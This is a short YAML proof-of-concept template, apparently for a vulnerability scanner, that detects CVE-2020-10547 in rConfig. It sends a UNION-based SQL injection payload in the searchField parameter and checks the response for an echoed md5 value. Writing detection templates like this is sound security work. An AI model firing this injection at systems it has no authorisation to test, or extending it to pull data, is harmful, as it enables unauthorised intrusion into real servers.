name: poc-yaml-rconfig-cve-2020-10547
binding: a48698d9-69a8-4aa3-a377-c3329d65dd93
manual: true
detail:
    author: 2husky
    links:
        - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
    vulnerability:
        id: CT-18079
        level: critical
transport: http
set:
    f1: randomLowercase(5)
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+md5('{{f1}}'),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains
            follow_redirects: false
        expression: response.status == 200 && response.body.bcontains(bytes(md5(f1)))
expression: r0()
